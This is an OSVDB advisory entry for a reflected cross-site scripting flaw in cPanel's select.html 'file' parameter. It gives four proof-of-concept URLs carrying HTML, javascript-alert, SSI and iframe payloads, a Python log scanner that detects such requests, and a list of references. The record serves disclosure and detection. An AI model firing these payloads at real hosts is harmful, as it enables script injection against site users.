cPanel select.html file Variable XSS

2006-06-25T11:03:55
ID OSVDB:26866
Type osvdb
Reporter OSVDB
Modified 2006-06-25T11:03:55

Description

Manual Testing Notes

http://[target]:[Port]/[Dir]/x/files/select.html?dir=/&file=<h1><b>Your code here!!</b></h1>

http://[target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');">

http://[target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" -->

http://[target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">
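The URLs above show the `file` parameter of select.html being reflected unescaped. As an added detection-side example (not part of this OSVDB record or of cPanel), the following Python flags web-server access-log requests to that endpoint whose `file` value carries markup; it assumes Common Log Format lines, and the sample lines are constructed.

```python
# Added example, not from the advisory: spot requests to cPanel's
# .../x/files/select.html whose "file" parameter contains markup or an
# SSI directive, as seen in the manual testing notes above.
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint path quoted in the advisory (the directory prefix may vary)
SELECT_PATH = re.compile(r"/x/files/select\.html$")
# A tag or "<!--" directive has no business in a plain filename
MARKUP = re.compile(r"<\s*/?\s*[A-Za-z!]")
# Request field of a Common Log Format line: "GET /path?query HTTP/1.x"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def is_select_html_xss_attempt(log_line: str) -> bool:
    """True when the request hits select.html with markup in file=."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    parts = urlsplit(m.group(1))
    if not SELECT_PATH.search(parts.path):
        return False
    # parse_qs percent-decodes once; unquote again so a double-encoded
    # value (%253C -> %3C -> <) is still caught
    for value in parse_qs(parts.query, keep_blank_values=True).get("file", []):
        if MARKUP.search(unquote(value)):
            return True
    return False


def scan(log_lines):
    """Return only the lines that look like attempts against this issue."""
    return [line for line in log_lines if is_select_html_xss_attempt(line)]


# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jun/2006:11:03:55 +0000] "GET /frontend/x/files/'
    'select.html?dir=/&file=%3Ch1%3E%3Cb%3Ehi%3C/b%3E%3C/h1%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Jun/2006:11:04:01 +0000] "GET /frontend/x/files/'
    'select.html?dir=/&file=notes.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Jun/2006:11:04:09 +0000] "GET /frontend/x/files/'
    'index.html?file=%3Cb%3Ex HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Jun/2006:11:04:20 +0000] "GET /frontend/x/files/'
    'select.html?dir=/&file=%253C!--%2523echo%2520var%3D%2522x%2522--%253E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious:", hit)
```

Legitimate filenames containing `<` will also be flagged, so treat a hit as a triage lead rather than a verdict.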

References:

Vendor Specific News/Changelog Entry: http://bugzilla.cpanel.net/show_bug.cgi?id=4282
Security Tracker: 1016383
Secunia Advisory ID: 20840
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0529.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0578.html
ISS X-Force ID: 27403
FrSIRT Advisory: ADV-2006-2547
CVE: CVE-2006-3337
Bugtraq ID: 18655